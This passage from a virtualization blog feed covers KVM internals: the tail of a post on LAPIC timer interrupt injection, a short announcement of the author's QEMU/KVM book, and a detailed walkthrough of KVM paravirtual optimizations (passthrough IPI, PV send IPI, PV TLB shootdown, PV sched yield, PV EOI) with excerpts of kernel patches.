if (kvm_use_posted_timer_interrupt(apic->vcpu)) {
if (apic->lapic_timer.timer_advance_ns)
__kvm_wait_lapic_expire(vcpu);
kvm_apic_inject_pending_timer_irqs(apic);
return;
}
atomic_inc(&apic->lapic_timer.pending);
kvm_set_pending_timer(vcpu);
}
</code></pre></div></div>
<p>‘kvm_apic_inject_pending_timer_irqs’ is used to inject the timer interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_apic_inject_pending_timer_irqs(struct kvm_lapic *apic)
{
struct kvm_timer *ktimer = &apic->lapic_timer;
kvm_apic_local_deliver(apic, APIC_LVTT);
if (apic_lvtt_tscdeadline(apic)) {
ktimer->tscdeadline = 0;
} else if (apic_lvtt_oneshot(apic)) {
ktimer->tscdeadline = 0;
ktimer->target_expiration = 0;
}
}
</code></pre></div></div>
<p>It just delivers the APIC_LVTT timer interrupt to the APIC. This takes the ‘case APIC_DM_FIXED’ branch in ‘__apic_accept_irq’, which injects the timer interrupt through a posted interrupt.</p>
My qemu/kvm book has been publicated2020-09-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/11/book
<p>During my study and work on virtualization, I have had to dig into a lot of code: SeaBIOS, the Linux kernel drivers, QEMU, and so on.
In this exciting journey I have written a lot of virtualization-related material, and many people have asked me questions while reading my blog.</p>
<p>Two years ago I decided to write a QEMU/KVM book, not just to help people but also as a memorial of my virtualization exploration. After countless nights and weekends of hard work, it has finally arrived.</p>
<p><img src="/assets/img/book/1.jpg" alt="" /></p>
<p>Its Chinese name is 《QEMU/KVM源码解析与应用》; I think its English name could be ‘QEMU/KVM Internals’.</p>
<p>The book contains very detailed analysis of QEMU/KVM-related virtualization technologies:</p>
<ul>
<li>Basic building blocks such as the event loop framework, the thread model, and QOM</li>
<li>Firmware emulation, including SeaBIOS analysis</li>
<li>CPU, memory, device, and interrupt emulation</li>
<li>Miscellaneous topics such as VM migration, QGA, and QEMU security</li>
</ul>
<p>It can be found in following websites:</p>
<ul>
<li><a href="https://www.taobao.com/">taobao.com</a></li>
<li><a href="https://www.jd.com/">jd.com</a></li>
<li><a href="http://www.dangdang.com/">dangdang.com</a></li>
</ul>
kvm performance optimization technologies, part one2020-09-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1
<p>In full virtualization the guest OS is not aware that it is running in a VM. If the OS knows it is running in a VM, it can do some optimizations to improve performance. This is called paravirtualization (PV). Generally speaking, any technique used in the guest OS that is based on the assumption that it is running in a VM can be called a PV technique. For example, virtio is a PV framework, and <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a PV feature. However, in this post I will not talk about these more complicated features but about some smaller PV performance optimizations.</p>
<p>One of the most important things in VM optimization is to reduce VM-exits as much as possible; ideally there are none at all.</p>
<p>This post covers the following PV optimizations:</p>
<ul>
<li>Passthrough IPI</li>
<li>PV Send IPI</li>
<li>PV TLB Shootdown</li>
<li>PV sched yield</li>
<li>PV EOI</li>
</ul>
<h3> Passthrough IPI </h3>
<p>Let’s first take as an example a PV feature proposed by ByteDance, which also has a <a href="https://dl.acm.org/doi/abs/10.1145/3381052.3381317">paper</a>:
<a href="https://www.spinics.net/lists/kvm/msg224093.html">Passthrough IPI</a>.</p>
<p>When the guest issues an IPI, it writes the ICR register of the LAPIC. This normally causes a VM-exit, as the LAPIC is emulated by the VMM.
‘Passthrough IPI’ tries to avoid this VM-exit and VM-entry by exposing the posted-interrupt capability to the guest. The following picture, from the paper above, shows the basic idea.</p>
<p><img src="/assets/img/pvfeature/1.png" alt="" /></p>
<p>The following picture shows this feature in more detail.</p>
<p><img src="/assets/img/pvfeature/2.png" alt="" /></p>
<h4> kvm side </h4>
<p>When creating the VM, userspace should set the gpa mapping for the pi_desc via ioctl(KVM_SET_PVIPI_ADDR).
‘vmx_set_pvipi_addr’ sets up the EPT mapping for this gpa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int vmx_set_pvipi_addr(struct kvm *kvm, unsigned long addr)
+{
+ int ret;
+
+ if (!enable_apicv || !x2apic_enabled())
+ return 0;
+
+ if (!IS_ALIGNED(addr, PAGE_SIZE)) {
+ pr_err("addr is not aligned\n");
+ return 0;
+ }
+
+ ret = x86_set_memory_region(kvm, PVIPI_PAGE_PRIVATE_MEMSLOT, addr,
+ PAGE_SIZE * PI_DESC_PAGES);
+ if (ret)
+ return ret;
+
+ to_kvm_vmx(kvm)->pvipi_gfn = addr >> PAGE_SHIFT;
+ kvm_pvipi_init(kvm, to_kvm_vmx(kvm)->pvipi_gfn);
+
+ return ret;
+
+}
</code></pre></div></div>
<p>‘kvm_pvipi_init’ will store the pvipi addr.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void kvm_pvipi_init(struct kvm *kvm, u64 pi_desc_gfn)
+{
+ kvm->arch.pvipi.addr = pi_desc_gfn;
+ kvm->arch.pvipi.count = PI_DESC_PAGES;
+ /* make sure addr and count is visible before set valid bit */
+ smp_wmb();
+ kvm->arch.pvipi.valid = 1;
+}
</code></pre></div></div>
<p>When creating a vcpu, the pi_desc page is set up:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int pi_desc_setup(struct kvm_vcpu *vcpu)
+{
+ struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
+ struct page *page;
+ int page_index, ret = 0;
+
+ page_index = vcpu->vcpu_id / PI_DESC_PER_PAGE;
+
+ /* pin pages in memory */
+ /* TODO: allow to move those page to support memory unplug.
+ * See comments in kvm_vcpu_reload_apic_access_page for details.
+ */
+ page = kvm_vcpu_gfn_to_page(vcpu, kvm_vmx->pvipi_gfn + page_index);
+ if (is_error_page(page)) {
+ ret = -EFAULT;
+ goto out;
+ }
+
+ to_vmx(vcpu)->pi_desc = page_address(page)
+ + vcpu->vcpu_id * PI_DESC_SIZE;
+out:
+ return ret;
+}
</code></pre></div></div>
<p>We can see this pi_desc is shared between the ‘guest’ and the vcpu struct.</p>
<p>The guest can read the ‘MSR_KVM_PV_IPI’ to get this shared pi_desc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ msr_info->data =
+ (vcpu->kvm->arch.pvipi.msr_val & ~(u64)0x1) |
+ vcpu->arch.pvipi_enabled;
+ break;
</code></pre></div></div>
<p>The guest can write ‘MSR_KVM_PV_IPI’ to enable or disable this feature.
If the guest disables the feature, kvm intercepts the ‘X2APIC_MSR(APIC_ICR)’ MSR
and ‘pvipi_enabled’ is false. If the guest enables it, kvm stops
intercepting the ‘X2APIC_MSR(APIC_ICR)’ MSR, which allows the guest to write this MSR directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ if (!vcpu->kvm->arch.pvipi.valid)
+ break;
+
+ /* Userspace (e.g., QEMU) initiated disabling PV IPI */
+ if (msr_info->host_initiated && !(data & KVM_PV_IPI_ENABLE)) {
+ vmx_enable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR),
+ MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = false;
+ pr_debug("host-initiated disabling PV IPI on vcpu %d\n",
+ vcpu->vcpu_id);
+ break;
+ }
+
+ if (!kvm_x2apic_mode(vcpu))
+ break;
+
+ if (data & KVM_PV_IPI_ENABLE && !vcpu->arch.pvipi_enabled) {
+ vmx_disable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR), MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = true;
+ pr_emerg("enable pv ipi for vcpu %d\n", vcpu->vcpu_id);
+ }
+ break;
</code></pre></div></div>
<h4> guest side </h4>
<p>When the guest starts up, it checks for the ‘KVM_FEATURE_PV_IPI’ feature, and if it exists ‘kvm_setup_pv_ipi2’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_setup_pv_ipi2(void)
+{
+ union pvipi_msr msr;
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (msr.valid != 1)
+ return -EINVAL;
+
+ if (msr.enable) {
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+
+ goto out;
+ } else {
+
+ pi_desc_page = ioremap_cache(msr.addr << PAGE_SHIFT,
+ PAGE_SIZE << msr.count);
+
+ if (!pi_desc_page)
+ return -ENOMEM;
+
+
+ pr_emerg("pv ipi msr val %lx, pi_desc_page %lx, %lx\n",
+ (unsigned long)msr.msr_val,
+ (unsigned long)pi_desc_page,
+ (unsigned long)&pi_desc_page[1]);
+
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+ apic->send_IPI = kvm_send_ipi;
+ apic->send_IPI_mask = kvm_send_ipi_mask2;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself2;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself2;
+ apic->send_IPI_all = kvm_send_ipi_all2;
+ apic->icr_read = kvm_icr_read;
+ apic->icr_write = kvm_icr_write;
+ pr_emerg("pv ipi enabled\n");
+ }
+out:
+ pr_emerg("pv ipi KVM setup real PV IPIs for cpu %d\n",
+ smp_processor_id());
+
+ return 0;
}
</code></pre></div></div>
<p>This function reads the shared pi_desc’s GPA; if the feature is not yet enabled, it maps this GPA to a GVA by calling ‘ioremap_cache’, writes ‘MSR_KVM_PV_IPI’ with the enable bit set, and replaces the apic callbacks with its own.</p>
<p>Since the guest still needs to access the LAPIC’s ICR, this feature introduces a ‘MSR_KVM_PV_ICR’ MSR to expose the physical LAPIC’s ICR to the VM.</p>
<h4> guest trigger IPI </h4>
<p>When the guest sends an IPI, ‘kvm_send_ipi’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_send_ipi(int cpu, int vector)
+{
+ /* In x2apic mode, apicid is equal to vcpu id.*/
+ u32 vcpu_id = per_cpu(x86_cpu_to_apicid, cpu);
+ unsigned int nv, dest/* , val */;
+
+ x2apic_wrmsr_fence();
+
+ WARN(vector == NMI_VECTOR, "try to deliver NMI");
+
+ /* TODO: rollback to old approach. */
+ if (vcpu_id >= MAX_PI_DESC)
+ return;
+
+ if (pi_test_and_set_pir(vector, &pi_desc_page[vcpu_id]))
+ return;
+
+ if (pi_test_and_set_on(&pi_desc_page[vcpu_id]))
+ return;
+
+ nv = pi_desc_page[vcpu_id].nv;
+ dest = pi_desc_page[vcpu_id].ndst;
+
+ x2apic_send_IPI_dest(dest, nv, APIC_DEST_PHYSICAL);
+
+}
</code></pre></div></div>
<p>As we can see, it gets ‘nv’ and ‘dest’ from the shared pi_desc page and calls ‘x2apic_send_IPI_dest’ to send the posted-interrupt notification vector to the ‘dest’ vcpu. From the LAPIC’s point of view, this is just a posted interrupt. If the target vcpu is running, this triggers virtual interrupt delivery; if it is preempted, it will be kicked to run.</p>
<h3> PV send IPI </h3>
<p>Wanpeng Li from Tencent also proposed a PV IPI feature, which was merged upstream. The following picture shows the idea, from <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">Boosting Dedicated Instances by KVM Tax Cut</a>.</p>
<p><img src="/assets/img/pvfeature/3.png" alt="" /></p>
<p>Instead of sending IPIs to the vcpus one by one, PV IPI uses a bitmap to record the target vcpus and then makes a single hypercall, thus reducing VM-exits.
The patchset is <a href="https://lkml.org/lkml/2018/7/23/108">here</a>. Let’s look at some details.</p>
<h4> kvm side </h4>
<p>The kvm should expose the pv send ipi feature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @@ -621,7 +621,8 @@ static inline int __do_cpuid_ent(struct kvm_cpuid_entry2 *entry, u32 function,
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
- (1 << KVM_FEATURE_ASYNC_PF_VMEXIT);
+ (1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
+ (1 << KVM_FEATURE_PV_SEND_IPI);
</code></pre></div></div>
<p>The kvm side should also implement the hyper call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +/*
+ * Return 0 if successfully added and 1 if discarded.
+ */
+static int kvm_pv_send_ipi(struct kvm *kvm, unsigned long ipi_bitmap_low,
+ unsigned long ipi_bitmap_high, int min, int vector, int op_64_bit)
+{
+ int i;
+ struct kvm_apic_map *map;
+ struct kvm_vcpu *vcpu;
+ struct kvm_lapic_irq irq = {
+ .delivery_mode = APIC_DM_FIXED,
+ .vector = vector,
+ };
+ int cluster_size = op_64_bit ? 64 : 32;
+
+ rcu_read_lock();
+ map = rcu_dereference(kvm->arch.apic_map);
+
+ for_each_set_bit(i, &ipi_bitmap_low, cluster_size) {
+ vcpu = map->phys_map[min + i]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ for_each_set_bit(i, &ipi_bitmap_high, cluster_size) {
+ vcpu = map->phys_map[min + i + cluster_size]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ rcu_read_unlock();
+ return 0;
+}
+
void kvm_vcpu_deactivate_apicv(struct kvm_vcpu *vcpu)
{
vcpu->arch.apicv_active = false;
@@ -6739,6 +6773,9 @@ int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
case KVM_HC_CLOCK_PAIRING:
ret = kvm_pv_clock_pairing(vcpu, a0, a1);
break;
+ case KVM_HC_SEND_IPI:
+ ret = kvm_pv_send_ipi(vcpu->kvm, a0, a1, a2, a3, op_64_bit);
+ break;
#endif
</code></pre></div></div>
<p>As we can see, in the hypercall handler ‘kvm_pv_send_ipi’ iterates over the bitmap and calls ‘kvm_apic_set_irq’ to send an interrupt to each destination vcpu.</p>
<h4> guest side </h4>
<p>When the system starts up, it checks whether ‘KVM_FEATURE_PV_SEND_IPI’ exists. If it does,
‘kvm_setup_pv_ipi’ is called and the apic callbacks are replaced with the PV IPI ones.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_setup_pv_ipi(void)
+{
+ apic->send_IPI_mask = kvm_send_ipi_mask;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself;
+ apic->send_IPI_all = kvm_send_ipi_all;
+ pr_info("KVM setup pv IPIs\n");
+}
</code></pre></div></div>
<h4> guest trigger IPI </h4>
<p>‘__send_ipi_mask’ is called to send IPI to vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __send_ipi_mask(const struct cpumask *mask, int vector)
+{
+ unsigned long flags;
+ int cpu, apic_id, min = 0, max = 0;
+#ifdef CONFIG_X86_64
+ __uint128_t ipi_bitmap = 0;
+ int cluster_size = 128;
+#else
+ u64 ipi_bitmap = 0;
+ int cluster_size = 64;
+#endif
+
+ if (cpumask_empty(mask))
+ return;
+
+ local_irq_save(flags);
+
+ for_each_cpu(cpu, mask) {
+ apic_id = per_cpu(x86_cpu_to_apicid, cpu);
+ if (!ipi_bitmap) {
+ min = max = apic_id;
+ } else if (apic_id < min && max - apic_id < cluster_size) {
+ ipi_bitmap <<= min - apic_id;
+ min = apic_id;
+ } else if (apic_id < min + cluster_size) {
+ max = apic_id < max ? max : apic_id;
+ } else {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ min = max = apic_id;
+ ipi_bitmap = 0;
+ }
+ __set_bit(apic_id - min, (unsigned long *)&ipi_bitmap);
+ }
+
+ if (ipi_bitmap) {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ }
+
+ local_irq_restore(flags);
+}
</code></pre></div></div>
<p>It sets the bits for the IPI target vcpus in the bitmap and finally calls kvm_hypercall4(KVM_HC_SEND_IPI).</p>
<h3> PV TLB Shootdown </h3>
<p>This feature is also from Wanpeng Li at Tencent.</p>
<p>A TLB (Translation Lookaside Buffer) is a cache that contains translations from virtual memory addresses to physical memory addresses. When one CPU changes a virtual-to-physical mapping, it needs to tell the other CPUs to invalidate that mapping in their TLB caches. This is called a TLB shootdown.</p>
<p>TLB shootdown is a performance-critical operation. On bare metal it is implemented by the architecture and completes with very low latency.</p>
<p>However, in a virtualized environment the target vCPU can be preempted or blocked. In this scenario the TLB flush initiator vCPU ends up busy-waiting for a long time until the preempted vCPU runs again. This is inefficient.</p>
<p>With PV TLB shootdown, the initiator vCPU does not wait for the sleeping vCPU; instead it just sets a flag in the guest-vmm shared area, and kvm checks this flag and does the TLB flush when the sleeping vCPU next runs.</p>
<h4> kvm side </h4>
<p>First as other pv optimization, we need to expose pv tlb shootdown to guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
(1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
</code></pre></div></div>
<p>PV TLB shootdown reuses the preempted field in ‘kvm_steal_time’ to expose the vcpu running/preempted state to the guest. When a vcpu that was preempted starts running again, kvm checks the flush flag and, if it is set, does the flush.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> record_steal_time()
{
if (xchg(&st->preempted, 0) & KVM_VCPU_FLUSH_TLB)
kvm_vcpu_flush_tlb_guest(vcpu);
}
</code></pre></div></div>
<p>When the vcpu is preempted, ‘KVM_VCPU_PREEMPTED’ is assigned to ‘st->preempted’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_steal_time_set_preempted(struct kvm_vcpu *vcpu)
{
st->preempted = vcpu->arch.st.preempted = KVM_VCPU_PREEMPTED;
}
</code></pre></div></div>
<h4> guest side </h4>
<p>When the guest starts up, it checks whether the ‘KVM_FEATURE_PV_TLB_FLUSH’ feature is available. If it is, ‘kvm_flush_tlb_others’ replaces the default implementation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (pv_tlb_flush_supported()) {
pv_ops.mmu.flush_tlb_others = kvm_flush_tlb_others;
pv_ops.mmu.tlb_remove_table = tlb_remove_table;
pr_info("KVM setup pv remote TLB flush\n");
}
static bool pv_tlb_flush_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_TLB_FLUSH) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest TLB flush </h4>
<p>When the guest does pv shootdown, ‘kvm_flush_tlb_others’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_flush_tlb_others(const struct cpumask *cpumask,
const struct flush_tlb_info *info)
{
u8 state;
int cpu;
struct kvm_steal_time *src;
struct cpumask *flushmask = this_cpu_cpumask_var_ptr(__pv_cpu_mask);
cpumask_copy(flushmask, cpumask);
/*
* We have to call flush only on online vCPUs. And
* queue flush_on_enter for pre-empted vCPUs
*/
for_each_cpu(cpu, flushmask) {
src = &per_cpu(steal_time, cpu);
state = READ_ONCE(src->preempted);
if ((state & KVM_VCPU_PREEMPTED)) {
if (try_cmpxchg(&src->preempted, &state,
state | KVM_VCPU_FLUSH_TLB))
__cpumask_clear_cpu(cpu, flushmask);
}
}
native_flush_tlb_others(flushmask, info);
}
</code></pre></div></div>
<p>Here we can see that it reads ‘src->preempted’; if it has the ‘KVM_VCPU_PREEMPTED’ bit set, ‘KVM_VCPU_FLUSH_TLB’ is set in ‘src->preempted’ and the cpu is cleared from the flush mask. Thus, when that vcpu is scheduled in, kvm does the TLB flush on its behalf.</p>
<h3> PV sched yield </h3>
<p>This feature is also from Wanpeng Li; he says in the patch that the idea is from Xen.
When sending a call-function IPI-many to vCPUs, yield (via hypercall) if any of the IPI target vCPUs was preempted.</p>
<h4> kvm side </h4>
<p>First we need to expose this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_SCHED_YIELD) |
</code></pre></div></div>
<p>Then we need to implement the hypercall handler to process the yield hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_SCHED_YIELD:
kvm_sched_yield(vcpu->kvm, a0);
ret = 0;
break;
}
static void kvm_sched_yield(struct kvm *kvm, unsigned long dest_id)
{
struct kvm_vcpu *target = NULL;
struct kvm_apic_map *map;
rcu_read_lock();
map = rcu_dereference(kvm->arch.apic_map);
if (likely(map) && dest_id <= map->max_apic_id && map->phys_map[dest_id])
target = map->phys_map[dest_id]->vcpu;
rcu_read_unlock();
if (target && READ_ONCE(target->ready))
kvm_vcpu_yield_to(target);
}
</code></pre></div></div>
<p>Find the target vcpu and yield to it.</p>
<h4> guest side </h4>
<p>When the guest starts up, it replaces ‘smp_ops.send_call_func_ipi’ with ‘kvm_smp_send_call_func_ipi’ if the PV sched yield feature is supported.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init kvm_guest_init(void)
{
if (pv_sched_yield_supported()) {
smp_ops.send_call_func_ipi = kvm_smp_send_call_func_ipi;
pr_info("KVM setup pv sched yield\n");
}
}
static bool pv_sched_yield_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_SCHED_YIELD) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest trigger call-function IPI-many </h4>
<p>When the guest sends a call-function IPI, the current vcpu first calls ‘native_send_call_func_ipi’ to send the IPI to the target vcpus. If a target vCPU is preempted, it issues a ‘KVM_HC_SCHED_YIELD’ hypercall. Notice this is only done for the first preempted vcpu found, as the target vcpus’ state can change underneath.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_smp_send_call_func_ipi(const struct cpumask *mask)
{
int cpu;
native_send_call_func_ipi(mask);
/* Make sure other vCPUs get a chance to run if they need to. */
for_each_cpu(cpu, mask) {
if (vcpu_is_preempted(cpu)) {
kvm_hypercall1(KVM_HC_SCHED_YIELD, per_cpu(x86_cpu_to_apicid, cpu));
break;
}
}
}
</code></pre></div></div>
<h3> PV EOI </h3>
<p>PV EOI is another (older) PV optimization. The idea behind PV EOI is to avoid the EOI write to the APIC, as the resulting VM-exit is expensive.
PV EOI uses shared memory, like many of the optimizations above: the VMM sets a flag in this shared memory before injecting an interrupt; when the guest processes the interrupt and writes an EOI, if it finds this flag it just clears it and returns.</p>
<h4> kvm side </h4>
<p>First of all the kvm should expose this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_EOI) |
</code></pre></div></div>
<p>The guest writes ‘MSR_KVM_PV_EOI_EN’ to set the gpa of the shared memory and the enable bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case MSR_KVM_PV_EOI_EN:
if (kvm_lapic_enable_pv_eoi(vcpu, data, sizeof(u8)))
return 1;
int kvm_lapic_enable_pv_eoi(struct kvm_vcpu *vcpu, u64 data, unsigned long len)
{
u64 addr = data & ~KVM_MSR_ENABLED;
struct gfn_to_hva_cache *ghc = &vcpu->arch.pv_eoi.data;
unsigned long new_len;
if (!IS_ALIGNED(addr, 4))
return 1;
vcpu->arch.pv_eoi.msr_val = data;
if (!pv_eoi_enabled(vcpu))
return 0;
if (addr == ghc->gpa && len <= ghc->len)
new_len = ghc->len;
else
new_len = len;
return kvm_gfn_to_hva_cache_init(vcpu->kvm, ghc, addr, new_len);
}
</code></pre></div></div>
<p>‘apic_sync_pv_eoi_to_guest’ is called at VM-entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_to_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
if (!pv_eoi_enabled(vcpu) ||
/* IRR set or many bits in ISR: could be nested. */
apic->irr_pending ||
/* Cache not set: could be safe but we don't bother. */
apic->highest_isr_cache == -1 ||
/* Need EOI to update ioapic. */
kvm_ioapic_handles_vector(apic, apic->highest_isr_cache)) {
/*
* PV EOI was disabled by apic_sync_pv_eoi_from_guest
* so we need not do anything here.
*/
return;
}
pv_eoi_set_pending(apic->vcpu);
}
</code></pre></div></div>
<p>‘pv_eoi_set_pending’ will set the ‘KVM_PV_EOI_ENABLED’ flag in shared memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void pv_eoi_set_pending(struct kvm_vcpu *vcpu)
{
if (pv_eoi_put_user(vcpu, KVM_PV_EOI_ENABLED) < 0) {
printk(KERN_WARNING "Can't set EOI MSR value: 0x%llx\n",
(unsigned long long)vcpu->arch.pv_eoi.msr_val);
return;
}
__set_bit(KVM_APIC_PV_EOI_PENDING, &vcpu->arch.apic_attention);
}
</code></pre></div></div>
<p>‘apic_sync_pv_eoi_from_guest’ is called at VM-exit or when an interrupt is canceled.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_from_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
bool pending;
int vector;
/*
* PV EOI state is derived from KVM_APIC_PV_EOI_PENDING in host
* and KVM_PV_EOI_ENABLED in guest memory as follows:
*
* KVM_APIC_PV_EOI_PENDING is unset:
* -> host disabled PV EOI.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is set:
* -> host enabled PV EOI, guest did not execute EOI yet.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is unset:
* -> host enabled PV EOI, guest executed EOI.
*/
BUG_ON(!pv_eoi_enabled(vcpu));
pending = pv_eoi_get_pending(vcpu);
/*
* Clear pending bit in any case: it will be set again on vmentry.
* While this might not be ideal from performance point of view,
* this makes sure pv eoi is only enabled when we know it's safe.
*/
pv_eoi_clr_pending(vcpu);
if (pending)
return;
vector = apic_set_eoi(apic);
trace_kvm_pv_eoi(apic, vector);
}
</code></pre></div></div>
<p>‘pv_eoi_get_pending’ gets the status of the shared flag. If it is still pending, the guest did not trigger the EOI write and there is nothing to do. If the guest did trigger the EOI, ‘apic_set_eoi’ is called here to set the EOI in the APIC.
Note that ‘apic->irr_pending’ is always true with virtual interrupt delivery enabled, so I think PV EOI is little used today, as APICv is very common.</p>
<h4> guest side </h4>
<p>When the guest starts up, it writes ‘MSR_KVM_PV_EOI_EN’ with the address of ‘kvm_apic_eoi’ and the ‘KVM_MSR_ENABLED’ bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_guest_cpu_init(void)
{
...
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI)) {
unsigned long pa;
/* Size alignment is implied but just to make it explicit. */
BUILD_BUG_ON(__alignof__(kvm_apic_eoi) < 4);
__this_cpu_write(kvm_apic_eoi, 0);
pa = slow_virt_to_phys(this_cpu_ptr(&kvm_apic_eoi))
| KVM_MSR_ENABLED;
wrmsrl(MSR_KVM_PV_EOI_EN, pa);
}
...
}
</code></pre></div></div>
<p>Also it will set the ‘eoi_write’ callback with ‘kvm_guest_apic_eoi_write’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_guest_init(void)
{
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI))
apic_set_eoi_write(kvm_guest_apic_eoi_write);
}
void __init apic_set_eoi_write(void (*eoi_write)(u32 reg, u32 v))
{
struct apic **drv;
for (drv = __apicdrivers; drv < __apicdrivers_end; drv++) {
/* Should happen once for each apic */
WARN_ON((*drv)->eoi_write == eoi_write);
(*drv)->native_eoi_write = (*drv)->eoi_write;
(*drv)->eoi_write = eoi_write;
}
}
</code></pre></div></div>
